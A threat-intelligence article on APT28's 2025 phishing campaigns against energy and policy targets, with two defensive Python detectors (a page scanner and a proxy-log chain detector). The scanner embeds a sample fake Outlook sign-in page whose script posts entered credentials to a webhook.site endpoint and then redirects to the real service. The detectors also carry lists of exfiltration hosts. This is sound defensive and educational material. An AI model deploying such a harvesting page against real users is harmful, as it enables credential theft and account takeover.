Russian APT28 Hunts Credentials Across Energy and Policy Networks
- Javier Conejo del Cerro
- 4 hours ago
- 3 min read

Credential theft does not always arrive with malware or exploits. Sometimes it walks through the front door, wearing familiar logos and carrying legitimate documents. In a series of campaigns observed throughout 2025, the Russia-linked threat actor APT28 (BlueDelta) has demonstrated how low-noise phishing, combined with trusted infrastructure and subtle redirection, can yield high-value intelligence access across energy, policy and government-adjacent organizations. The operation underscores how credential harvesting remains one of the GRU’s most effective and cost-efficient espionage tools.
Phase 1 — Targeted Trust Building
APT28 focused on a small but carefully selected victim set, including individuals tied to a Turkish energy and nuclear research agency, a European think tank, and organizations in North Macedonia and Uzbekistan. The targeting reflects clear intelligence priorities: energy research, defense cooperation, and government communication networks relevant to Russian strategic interests.
Lures were regionally and professionally tailored, including Turkish-language content and policy-focused messaging. Rather than generic phishing, victims were approached with material aligned to their expertise, increasing credibility and reducing suspicion.
Phase 2 — Legitimate Content as a Decoy
The attack chain typically began with a phishing email containing a shortened link. Once clicked, victims were briefly shown legitimate PDF documents, such as a Gulf Research Center publication on the Iran–Israel conflict or a Mediterranean policy briefing from ECCO.
This decoy stage lasted only seconds, but it served a critical purpose: establishing authenticity before the real attack unfolded. By leveraging genuine, publicly available documents from reputable institutions, the attackers lowered the victim’s guard at precisely the right moment.
Phase 3 — Credential Harvesting via Trusted Infrastructure
After the decoy, victims were silently redirected to spoofed login pages mimicking well-known services, including:
- Microsoft Outlook Web Access (OWA)
- Google authentication portals
- Sophos VPN login and password reset pages
These phishing pages were hosted on legitimate but disposable internet services, such as webhook[.]site, InfinityFree, Byet Internet Services, and ngrok. Embedded JavaScript handled the whole flow in sequence: beaconing to a webhook endpoint to confirm the page had been loaded, capturing the credentials submitted through hidden HTML form elements, exfiltrating them to the same disposable endpoints, and then redirecting the victim to the real service.
This final redirection was key. Because users ultimately landed on the genuine login page or document, many remained unaware their credentials had already been stolen.
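The indicators described above (a password form with hidden fields, a sink on a webhook or free-hosting domain, and a post-submit bounce to the genuine service) can be checked statically once a suspect page has been fetched. The following Python scanner is an added example, not code from the article or from Recorded Future; the domain lists, the brand table, the sample phishing page and the benign page are constructed assumptions.

```python
"""Static scan of a fetched page for credential-harvesting indicators.
Added example for this article; the domain lists, brand table and sample pages
below are constructed assumptions, not data from the reporting."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed: disposable hosting/exfil services named in the article and typical
# hostnames they hand out. Extend for your own environment.
DISPOSABLE_DOMAINS = ("webhook.site", "ngrok.io", "ngrok-free.app",
                      "infinityfreeapp.com", "byethost")
# Assumed: genuine sign-in hosts a phishing page bounces the victim back to.
GENUINE_LOGIN_DOMAINS = ("outlook.office.com", "login.microsoftonline.com",
                         "accounts.google.com")
# Assumed: brand keyword in <title> -> hosts that may legitimately serve it.
BRANDS = {"outlook": ("outlook.office.com", "login.microsoftonline.com"),
          "google": ("accounts.google.com",),
          "sophos": ("sophos.com",)}
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")
REDIRECT_RE = re.compile(r"""(?:window\.)?location(?:\.href)?\s*=\s*['"](https?://[^'"]+)['"]""")


class PageScanner(HTMLParser):
    """Collects <title>, <form action>, <input> fields and inline <script> text."""

    def __init__(self):
        super().__init__()
        self.title, self.form_actions, self.inputs, self.scripts = "", [], [], []
        self._in = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input":
            self.inputs.append(((a.get("type") or "text").lower(), a.get("name") or ""))
        elif tag in ("script", "title"):
            self._in = tag

    def handle_endtag(self, tag):
        if tag == self._in:
            self._in = None

    def handle_data(self, data):
        if self._in == "script":
            self.scripts.append(data)
        elif self._in == "title":
            self.title += data


def host_of(url):
    return urlparse(url).netloc.lower()


def host_matches(host, suffixes):
    # Exact, subdomain or prefix match (prefix covers providers such as byethost
    # that hand out many numbered domains).
    return any(host == s or host.endswith("." + s) or host.startswith(s) for s in suffixes)


def scan_page(html, page_host):
    """Return a list of indicator strings; an empty list means nothing was flagged."""
    p = PageScanner()
    p.feed(html)
    script = "\n".join(p.scripts)
    types = [t for t, _ in p.inputs]
    hidden = [n for t, n in p.inputs if t == "hidden"]
    findings = []
    if host_matches(page_host, DISPOSABLE_DOMAINS):
        findings.append("page hosted on disposable service: " + page_host)
    if "password" in types and hidden:
        findings.append("password form carries hidden fields: " + ", ".join(hidden))
    # Where does submitted data go? Form actions plus every URL in inline script.
    sink_hosts = sorted({host_of(u) for u in p.form_actions + URL_RE.findall(script)} - {""})
    for h in sink_hosts:
        if host_matches(h, DISPOSABLE_DOMAINS):
            findings.append("traffic to disposable service: " + h)
        elif "password" in types and h != page_host and not host_matches(h, GENUINE_LOGIN_DOMAINS):
            findings.append("credentials may be posted off-host: " + h)
    # Does the page bounce the victim to the real service after submission?
    for target in REDIRECT_RE.findall(script):
        t = host_of(target)
        if host_matches(t, GENUINE_LOGIN_DOMAINS) and t != page_host:
            findings.append("post-submit redirect to genuine service: " + t)
    # Does the page name a brand it is not served by?
    for brand, hosts in BRANDS.items():
        if brand in p.title.lower() and not host_matches(page_host, hosts):
            findings.append(f"page imitates {brand} but is served from {page_host}")
    return findings


# Constructed sample page modelled on the behaviour described in the article.
SAMPLE_PAGE = """<html><head><title>Outlook Web App - Sign in</title></head><body>
<form id="f"><input type="text" name="username"><input type="password" name="password">
<input type="hidden" name="cid" value="abc123"><button type="submit">Sign in</button></form>
<script>
fetch("https://webhook.site/00000000-0000-0000-0000-000000000000?loaded=1");
document.getElementById("f").onsubmit = function (e) {
  e.preventDefault();
  fetch("https://webhook.site/00000000-0000-0000-0000-000000000000",
        {method: "POST", body: new FormData(e.target)}).then(function () {
    window.location = "https://outlook.office.com/owa/";
  });
};
</script></body></html>"""

# Constructed benign page: same form shape, but data stays on the serving host.
BENIGN_PAGE = """<html><head><title>Acme Portal</title></head><body>
<form action="/login" method="post"><input type="text" name="u">
<input type="password" name="p"></form></body></html>"""

if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE, "owa-login.infinityfreeapp.com"):
        print("[!]", f)
```

Run against the sample page the scanner reports five indicators (disposable hosting, hidden fields beside a password input, a webhook.site sink, a redirect to outlook.office.com, and an Outlook title on a non-Microsoft host); the benign page produces none. Any one indicator alone is weak; the combination of an off-host credential sink and a redirect back to the genuine service is the signature worth alerting on.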
Phase 4 — Data Compromised and Operational Impact
The stolen information included usernames, passwords and associated account identifiers, enabling attackers to access:
- Email mailboxes
- VPN portals
- Internal collaboration and communication systems
With valid credentials in hand, APT28 could conduct follow-on intelligence collection, internal reconnaissance, and long-term monitoring without deploying malware. The same core technique was reused across multiple campaigns in February, April, June and September 2025, demonstrating a sustained and repeatable operational playbook.
Phase 5 — Attribution and Strategic Pattern
Recorded Future attributes the activity to APT28 (BlueDelta), a GRU-linked threat actor with a long history of credential harvesting. The campaigns align with earlier operations against UKR[.]net users and mirror APT28’s consistent reliance on low-cost, high-yield phishing rather than exploit-heavy intrusion chains.
The abuse of free hosting platforms and webhook services highlights a deliberate strategy: infrastructure that is easy to replace, difficult to blacklist pre-emptively, and trusted by default within enterprise environments.
Measures to Defend Against Credential Harvesting Campaigns
- Enforce phishing-resistant MFA (FIDO2 or certificate-based) on email, VPN and cloud services so that a captured password is not sufficient to sign in. Push-notification or one-time-code MFA raises the bar but can still be relayed by an adversary-in-the-middle phishing kit.
- Monitor proxy and DNS logs for redirect chains that pass through URL shorteners and then land on webhook services, ngrok, InfinityFree or similar disposable hosting platforms; the sequence is a stronger signal than any single domain.
- Deploy conditional access policies that require a managed device, a known location or a low sign-in risk score for OWA, VPN and cloud sign-ins, so that a valid password presented from attacker infrastructure is still rejected.
- Educate users to treat unexpected document links and login prompts as high-risk, even when the document itself is genuine; a real PDF followed by a sign-in page is exactly the pattern used here.
- Restrict exposure of legacy or password-only authentication on Outlook Web Access, VPN portals and webmail interfaces.
- Continuously audit credential reuse across services, and rotate credentials for high-risk roles promptly whenever exposure is suspected rather than only on a calendar schedule.
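One way to operationalize the monitoring recommendation above, and to catch the redirect chain described in Phase 3, is to look for the whole sequence per user in proxy logs rather than for any single domain. The following Python detector is an added example, not tooling from the article or from any vendor; the log format, domain lists, two-minute window and sample log lines are constructed assumptions.

```python
"""Redirect-chain detection over proxy logs for the phishing flow described above.
Added example for this article; the log format, domain lists, time window and
sample log lines are constructed assumptions, not vendor tooling."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Assumed lists; extend from your own intelligence feeds.
SHORTENERS = ("bit.ly", "tinyurl.com", "t.co", "rb.gy")
DISPOSABLE = ("webhook.site", "ngrok.io", "ngrok-free.app", "infinityfreeapp.com", "byethost")
GENUINE_LOGIN = ("outlook.office.com", "login.microsoftonline.com", "accounts.google.com")
WINDOW = timedelta(seconds=120)  # assumed: the whole chain completes within two minutes

# Assumed log format: "<ISO-8601 timestamp> <user> <method> <url> <status>"
LINE_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\d{3})$")


def host_matches(host, suffixes):
    # Exact, subdomain or prefix match (prefix covers numbered byethost domains).
    return any(host == s or host.endswith("." + s) or host.startswith(s) for s in suffixes)


def parse_line(line):
    """Return (timestamp, user, method, url, status) or None for unparseable lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, user, method, url, status = m.groups()
    return (datetime.fromisoformat(ts.replace("Z", "+00:00")), user, method, url, int(status))


def classify(method, url):
    """Map one request to a stage of the chain, or None if it is unremarkable."""
    u = urlparse(url)
    host, path = u.netloc.lower(), u.path.lower()
    if host_matches(host, SHORTENERS):
        return "shortener"
    if host_matches(host, DISPOSABLE):
        return "exfil" if method == "POST" else "disposable"
    if host_matches(host, GENUINE_LOGIN):
        return "genuine_login"
    if path.endswith(".pdf"):
        return "decoy_document"
    return None


def detect_chains(log_lines):
    """Return one (user, window_start_iso, stages) tuple per flagged window.

    A window starting at a request is flagged when, within WINDOW, a page on
    disposable hosting co-occurs with a POST to disposable infrastructure, or
    with both a shortener hit and a genuine login. Each request is counted in
    at most one alert.
    """
    by_user = defaultdict(list)
    for line in log_lines:
        ev = parse_line(line)
        if ev:
            by_user[ev[1]].append(ev)
    alerts = []
    for user, events in by_user.items():
        events.sort(key=lambda e: e[0])
        i = 0
        while i < len(events):
            t0 = events[i][0]
            window = [e for e in events[i:] if e[0] - t0 <= WINDOW]
            stages = [s for s in (classify(e[2], e[3]) for e in window) if s]
            seen = set(stages)
            if "disposable" in seen and ("exfil" in seen or {"shortener", "genuine_login"} <= seen):
                alerts.append((user, t0.isoformat(), stages))
                i += len(window)
            else:
                i += 1
    return alerts


# Constructed sample log: alice walks the full chain, bob only signs in to the
# genuine service, carol clicks a shortened link to a PDF and stops there.
SAMPLE_LOG = """\
2025-06-12T09:14:02Z alice GET https://bit.ly/3AbCdEf 302
2025-06-12T09:14:03Z alice GET https://publisher.example/reports/gulf-brief.pdf 200
2025-06-12T09:14:05Z alice GET https://owa-login.infinityfreeapp.com/owa/ 200
2025-06-12T09:14:31Z alice POST https://webhook.site/00000000-0000-0000-0000-000000000000 200
2025-06-12T09:14:32Z alice GET https://outlook.office.com/owa/ 200
2025-06-12T10:02:10Z bob GET https://outlook.office.com/owa/ 200
2025-06-12T10:30:00Z carol GET https://bit.ly/3XyZ 302
2025-06-12T10:30:01Z carol GET https://publisher.example/reports/gulf-brief.pdf 200
"""

if __name__ == "__main__":
    for user, start, stages in detect_chains(SAMPLE_LOG.splitlines()):
        print(f"[!] {user} at {start}: {' -> '.join(stages)}")
```

On the sample log only alice is flagged, with the stage list shortener -> decoy_document -> disposable -> exfil -> genuine_login; carol's shortener-plus-PDF activity is ordinary and stays silent. Because the flagged window ends with a successful sign-in to the genuine service, the alert should trigger an immediate credential reset and session revocation for that user, not just a ticket.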
APT28’s campaigns highlight how credential harvesting remains a low-noise, high-impact espionage technique. By abusing legitimate documents, trusted infrastructure and seamless redirection flows, attackers bypass technical defenses and rely on user trust instead of malware.
The absence of exploits or payloads does not reduce the severity of the compromise. Once credentials are stolen, attackers gain persistent, covert access to sensitive communications and internal systems, often without triggering alerts.
As long as authentication workflows remain human-driven and password-dependent, credential phishing will continue to be a primary entry point for state-sponsored actors. Defensive strategies must therefore prioritize identity protection as a critical security perimeter.
The Hacker News